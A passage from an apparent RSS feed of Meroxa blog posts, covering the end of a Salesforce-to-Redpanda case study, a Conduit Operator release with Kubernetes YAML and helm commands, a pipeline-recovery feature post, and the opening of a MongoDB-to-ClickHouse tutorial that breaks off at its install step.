&lt;li&gt;&lt;strong&gt;Data updates are now processed in real-time&lt;/strong&gt;, enabling faster response times and improved service levels.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reduced Operational Costs&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;By streamlining its architecture and eliminating the need for multiple data streaming services, THN reduced operational complexity and cut costs by up to &lt;strong&gt;30%&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Insights&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Real-time data streaming from Salesforce into Redpanda allowed THN to make informed decisions quickly, enhancing customer support with more timely responses to customer interactions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;The solution provided by Meroxa offers a flexible and scalable platform, allowing THN to handle current data volumes and easily expand as their needs grow.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/redpanda_JSON_messages.png&quot; alt=&quot;redpanda_JSON_messages.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;&quot;By publishing event messages in Salesforce&apos;s Apex to Meroxa, we&apos;ve enabled our Client Success team to speed up the onboarding process for new clients and a more reduced number of data entry issues&quot;.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;David Sanchez Carmona&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Senior GTM Systems Manager&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform has transformed THN’s data architecture by providing a streamlined, scalable, and cost-effective solution to manage their data flow between Salesforce and Redpanda. With real-time insights, reduced complexity, and lower operational costs, THN is now positioned to enhance its customer service capabilities and optimize its operations for future growth.&lt;/p&gt;
&lt;p&gt;By consolidating multiple services into a single, efficient pipeline, THN can continue to innovate and scale, with a future-proof infrastructure capable of adapting to their evolving needs.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Operator v0.02 with Schema Registry Support!]]></title><description><![CDATA[We’re excited to introduce the latest update to the **Conduit Operator**, now with built-in **schema registry support**. This new feature allows seamless data encoding and decoding, improving data compatibility across your pipelines. Whether you're managing multiple Conduit instances or scaling your data operations, schema registry integration ensures a smoother, more reliable experience for handling complex data flows.]]></description><link>https://meroxa.com/blog/conduit-operator-v002-with-schema-registry-support</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-operator-v002-with-schema-registry-support</guid><dc:creator><![CDATA[Lyubo Kamenov]]></dc:creator><pubDate>Fri, 25 Oct 2024 03:47:02 GMT</pubDate><content:encoded>&lt;p&gt;We are thrilled to announce the release of &lt;strong&gt;Conduit Operator v0.0.2&lt;/strong&gt;, designed to simplify the management and orchestration of Conduit instances within Kubernetes.&lt;/p&gt;
&lt;h1&gt;What Is the Conduit Operator?&lt;/h1&gt;
&lt;p&gt;The &lt;strong&gt;Conduit Operator&lt;/strong&gt; extends the Kubernetes API, allowing users to manage Conduit instances as custom resources. These resources define how each Conduit pipeline is provisioned and managed throughout its lifecycle, giving you full control over your data flow while leveraging Kubernetes-native features like scaling, monitoring, and logging.&lt;/p&gt;
&lt;p&gt;Conduit pipelines can be declared using YAML configuration, much like how any other Kubernetes resources are configured and deployed. This flexibility allows you to integrate your data streaming processes into existing DevOps workflows and infrastructure management tools with ease.&lt;/p&gt;
&lt;h3&gt;A Glimpse into Conduit Custom Resources&lt;/h3&gt;
&lt;p&gt;Conduit pipelines are represented as Kubernetes custom resources, where each pipeline runs as its own distinct Conduit instance. Below is a basic example of how a Conduit pipeline is defined:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;apiVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; operator.conduit.io/v1alpha
&lt;span class=&quot;token key atrule&quot;&gt;kind&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Conduit
&lt;span class=&quot;token key atrule&quot;&gt;metadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;generator
&lt;span class=&quot;token key atrule&quot;&gt;spec&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;running&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; generator.log
  &lt;span class=&quot;token key atrule&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; generator pipeline
  &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.type
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; structured
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.id
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.name
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.company
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.trial
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;bool&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; recordCount
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;3&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;log&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This configuration provides a declarative way to manage data pipelines, reducing the manual overhead typically required to build and manage streaming architectures.&lt;/p&gt;
&lt;h3&gt;Streamlining Connector Management&lt;/h3&gt;
&lt;p&gt;Using standalone connector with the Conduit Operator is simplified by allowing them to be hot loaded through GitHub repositories rather than included into the instance image.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# github.com/conduitio/conduit-connector-generator will be build and loaded&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;# by the operator.&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduitio/conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;generator
  &lt;span class=&quot;token key atrule&quot;&gt;pluginVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; v0.8.0
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The operator automatically provisions and manages the necessary resources to run the connectors. These connectors, sourced from organizations like &lt;strong&gt;conduitio&lt;/strong&gt;, &lt;strong&gt;meroxa&lt;/strong&gt;, and &lt;strong&gt;conduitio-labs&lt;/strong&gt;, provide out-of-the-box integrations with popular systems.&lt;/p&gt;
&lt;h3&gt;Schema Support for Enhanced Data Handling&lt;/h3&gt;
&lt;p&gt;As of Conduit v0.11.0, the platform supports schema registries, which allows connectors to encode and decode data using predefined schemas. This enables more robust data management and ensures compatibility between different data systems.&lt;/p&gt;
&lt;p&gt;An example configuration for utilizing a schema registry looks like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;apiVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; operator.conduit.io/v1alpha
&lt;span class=&quot;token key atrule&quot;&gt;kind&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Conduit
&lt;span class=&quot;token key atrule&quot;&gt;metadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;generator&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;schema&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;registry
&lt;span class=&quot;token key atrule&quot;&gt;spec&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;schemaRegistry&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//apicurio&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;8080/apis/ccompat/v7
    &lt;span class=&quot;token key atrule&quot;&gt;basicAuthUser&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;schemaUser&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;basicAuthPassword&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;secretRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;registry&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;password
        &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;registry&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;secret
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This level of flexibility is essential for businesses dealing with large-scale data integrations, as it allows multiple Conduit instances to share a schema registry across different environments and scale pipelines independently.&lt;/p&gt;
&lt;h3&gt;Deploying Conduit Operator&lt;/h3&gt;
&lt;p&gt;Deployment of the Conduit Operator can be done via Helm, a popular Kubernetes package manager. By using Helm charts, you can easily manage deployments, scaling, and updates of Conduit instances within your Kubernetes clusters.&lt;/p&gt;
&lt;p&gt;To deploy the operator, you can simply run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;helm repo &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; conduit https://conduitio.github.io/conduit-operator
helm &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; conduit-operator &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
    conduit/conduit-operator --create-namespace &lt;span class=&quot;token parameter variable&quot;&gt;-n&lt;/span&gt; conduit-operator
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Monitoring and Scaling with Kubernetes&lt;/h3&gt;
&lt;p&gt;One of the key advantages of the Conduit Operator is its integration with Kubernetes-native features. For example, you can add annotations to your Conduit instances to automatically scrape metrics using Prometheus:&lt;/p&gt;
&lt;p&gt;This is achieved by customizing the Helm value file when deploying the operator. Future work will allow for these annotations to be placed directly on the Conduit resource.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# Create values.yaml using these settings&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;controller&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;conduitMetadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;podAnnotations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prometheus.io/scrape&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prometheus.io/path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; /metrics
      &lt;span class=&quot;token key atrule&quot;&gt;prometheus.io/port&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;8080&lt;/span&gt;
      
&lt;span class=&quot;token comment&quot;&gt;# Install or upgrade the operator via helm&lt;/span&gt;
helm install conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;operator \
    conduit/conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;operator &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;create&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;namespace &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;n conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;operator \
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;f values.yaml&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This seamless integration enables robust monitoring and scaling options, ensuring your data pipelines are optimized for performance and reliability.&lt;/p&gt;
&lt;h3&gt;Why Use Conduit Platform?&lt;/h3&gt;
&lt;p&gt;While the &lt;strong&gt;Conduit Operator&lt;/strong&gt; offers a robust solution for managing data pipelines within Kubernetes, the &lt;strong&gt;Conduit Platform&lt;/strong&gt; takes this further by providing a &lt;strong&gt;low-code experience&lt;/strong&gt; and additional &lt;strong&gt;enterprise features&lt;/strong&gt;. With the Conduit Platform, you can easily build, monitor, and scale complex data pipelines with minimal manual effort.&lt;/p&gt;
&lt;p&gt;Key advantages of using the Conduit Platform include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Low-Code Interface&lt;/strong&gt;: Quickly configure and manage pipelines without extensive coding.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enterprise Features&lt;/strong&gt;: Enhanced security, monitoring, and scaling options tailored for large-scale enterprise needs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streamlined Workflows&lt;/strong&gt;: Easily connect disparate data sources and sinks, optimizing data flow across your infrastructure.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Whether you&apos;re looking to deploy individual instances with Conduit Operator or scale enterprise-wide with the Conduit Platform, Meroxa provides the tools and flexibility to manage your data pipelines efficiently.&lt;/p&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;The &lt;strong&gt;Conduit Operator&lt;/strong&gt; simplifies data pipeline management in Kubernetes environments, enabling you to easily manage data streams. For businesses looking to scale, integrate complex data systems, and optimize their operations, the &lt;strong&gt;Conduit Platform&lt;/strong&gt; provides a powerful low-code solution that expands on the capabilities of the Conduit Operator.&lt;/p&gt;
&lt;p&gt;Get started with Conduit Operator on &lt;a href=&quot;https://github.com/ConduitIO/conduit-operator&quot;&gt;GitHub&lt;/a&gt; and take your data pipeline management to the next level with the Conduit Platform for a low-code, enterprise-ready experience. Also check out our &lt;a href=&quot;https://conduit.io/docs/scaling/conduit-operator&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Looking for managed platform solutions? Check out our Conduit Platform by &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;requesting a demo&lt;/a&gt;. Let&apos;s build the future of data integration together!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Unlocking Resilience: Conduit v0.12.0 Introduces Pipeline Recovery]]></title><description><![CDATA[The Conduit team has just released Conduit v0.12, and we're gearing up for the launch of Conduit v1 with a focus on making pipelines more resilient. One key feature of this release is pipeline recovery, designed to automatically restart pipelines that experience temporary errors like network interruptions or service downtime.

With configurable backoff settings, Conduit can efficiently handle retries, reducing the impact of transient issues. Learn more about this feature and how it ensures your pipelines are always up and running.]]></description><link>https://meroxa.com/blog/unlocking-resilience-conduit-v0120-introduces-pipeline-recovery</link><guid isPermaLink="false">https://meroxa.com/blog/unlocking-resilience-conduit-v0120-introduces-pipeline-recovery</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Fri, 11 Oct 2024 16:20:16 GMT</pubDate><content:encoded>&lt;p&gt;Hey, data streaming fans! The Conduit team is happy to inform you that Conduit v0.12 has &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.12.0&quot;&gt;just been released&lt;/a&gt;! As we prepare for the launch of Conduit v1, one of the key things we’ve been focusing on is how to make our pipelines more resilient. We believe this is a crucial step in preparing for the 1.0 major release.&lt;/p&gt;
&lt;p&gt;Many in the data streaming world know that there is no such thing as a pipeline that is &lt;em&gt;always running&lt;/em&gt;. Most pipeline errors encountered are a result of temporary issues like network interruptions or services being unavailable due to maintenance. It then becomes a matter of how we handle the pipeline.&lt;/p&gt;
&lt;p&gt;In most cases, simply retrying is enough to get through transient errors efficiently. This can and should be done by connectors and processors. But what if they don’t have a proper backoff implementation? For Conduit users, this typically means they would need to wait for the connector or processor to be updated. That’s where Conduit’s pipeline recovery comes in.&lt;/p&gt;
&lt;h2&gt;How does it work?&lt;/h2&gt;
&lt;p&gt;If a pipeline experiences an error such as a source connector cannot read a record or a processor fails to process a record, the pipeline is stopped and the status is set to &lt;code class=&quot;language-text&quot;&gt;degraded&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Pipeline recovery in Conduit v0.12 by default will restart the pipeline that experienced the error. However, you can always &lt;a href=&quot;https://conduit.io/docs/features/pipeline-recovery/#how-to-disable-pipeline-recovery&quot;&gt;disable this feature if needed&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Conduit restarts a previously failed pipeline using a backoff algorithm for which the parameters can be tuned with &lt;a href=&quot;https://conduit.io/docs/features/configuration&quot;&gt;CLI flags, environment variables, or a global configuration file&lt;/a&gt;. We’ll explain this behavior through the following scenario, assuming that the default backoff settings are used.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A PostgreSQL-to-MongoDB pipeline starts.&lt;/li&gt;
&lt;li&gt;After some time, the source PostgreSQL instance becomes unavailable. This results in an error that causes the pipeline to stop.&lt;/li&gt;
&lt;li&gt;Conduit waits for 1 second and restarts the pipeline.&lt;/li&gt;
&lt;li&gt;The pipeline fails again because the source PostgreSQL instance is still unavailable. The waiting is multiplied by 2, so Conduit waits for 2 seconds.&lt;/li&gt;
&lt;li&gt;Step 4 is repeated until the pipeline is running. Maximum waiting time is 10 minutes.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Here&apos;s a diagram of the algorithm:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/pipe-recovery.png&quot; alt=&quot;pipe-recovery.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;By default, there’s no limit on the number of retries. If the retries are &lt;a href=&quot;https://conduit.io/docs/features/pipeline-recovery#pipelineserror-recoverymax-retries&quot;&gt;limited&lt;/a&gt;, then Conduit will also make sure that the recovery attempts are reset smartly so that:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Recovery attempts are not tracked indefinitely. That would cause, for example, a pipeline to transition into the &lt;code class=&quot;language-text&quot;&gt;degraded&lt;/code&gt; state because it failed 3 times in the past 12 months.&lt;/li&gt;
&lt;li&gt;A pipeline is not being restarted indefinitely because it manages to start just before the maximum number of retries, and after some time, it fails again.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The documentation for pipeline recovery can be found &lt;a href=&quot;https://conduit.io/docs/features/pipeline-recovery&quot;&gt;here&lt;/a&gt;. As always, the Conduit team is happy to hear any feedback you might have about this feature! You can find us on our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; or you can start a new &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streaming Data from MongoDB to ClickHouse using Conduit Platform]]></title><description><![CDATA[Learn how to stream data from MongoDB to ClickHouse in real-time using Meroxa Conduit. This step-by-step guide simplifies data integration for scalable analytics and real-time reporting, empowering you to unlock insights faster.]]></description><link>https://meroxa.com/blog/streaming-data-from-mongodb-to-clickhouse-using-conduit-platform</link><guid isPermaLink="false">https://meroxa.com/blog/streaming-data-from-mongodb-to-clickhouse-using-conduit-platform</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Mon, 23 Sep 2024 18:04:46 GMT</pubDate><content:encoded>&lt;p&gt;The new world of data is requiring the ability to move data quickly and efficiently across systems and, is vital for organizations seeking to gain real-time insights. Streaming data from sources like MongoDB to powerful analytics databases like ClickHouse can unlock opportunities for faster decision-making and more responsive applications. In this blog, we will walk through the technical process of setting up a real-time data streaming pipeline from MongoDB to ClickHouse using &lt;strong&gt;Conduit&lt;/strong&gt;, an open-source data integration tool designed for high-performance streaming.&lt;/p&gt;
&lt;p&gt;This guide builds on our previous demonstration of moving data from PostgreSQL to ClickHouse, and we’ll now shift our focus to MongoDB as the source of our real-time data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why Stream Data from MongoDB to ClickHouse?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;MongoDB is a popular NoSQL database well-suited for managing large volumes of flexible, unstructured data. However, as applications grow and the need for real-time analytics arises, MongoDB may not be optimized for complex analytical queries at scale. This is where &lt;strong&gt;ClickHouse&lt;/strong&gt; comes in—known for its lightning-fast analytical capabilities, it is perfect for handling high-velocity, complex queries over large datasets.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;By streaming data from MongoDB to ClickHouse&lt;/strong&gt;, organizations can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Perform real-time analytics on transactional data.&lt;/li&gt;
&lt;li&gt;Benefit from ClickHouse’s OLAP (Online Analytical Processing) strengths.&lt;/li&gt;
&lt;li&gt;Visualize large data sets with minimal latency using tools like Grafana.&lt;/li&gt;
&lt;li&gt;Ensure scalability and maintain performance as the system grows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Setting Up the Pipeline: Streaming from MongoDB to ClickHouse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Now, let’s dive into the technical steps required to set up a real-time data streaming pipeline from MongoDB to ClickHouse using Conduit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 1: Installing Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;First, you’ll need to install Conduit, which acts as the backbone of our data pipeline. The setup process is straightforward:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Head to the &lt;a href=&quot;https://conduit.io/docs/getting-started/installing-and-running&quot;&gt;Conduit installation documentation&lt;/a&gt; to download the binary for your platform.&lt;/li&gt;
&lt;li&gt;Follow the instructions to install and run Conduit on your system.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once installed, you should have the conduit command available in your terminal. This will be used to manage and run our data pipeline.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 2: Setting Up MongoDB and ClickHouse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MongoDB Configuration&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;If you haven’t already, install MongoDB:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;brew tap mongodb&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;brew
brew install mongodb&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;community@&lt;span class=&quot;token number&quot;&gt;5.0&lt;/span&gt;
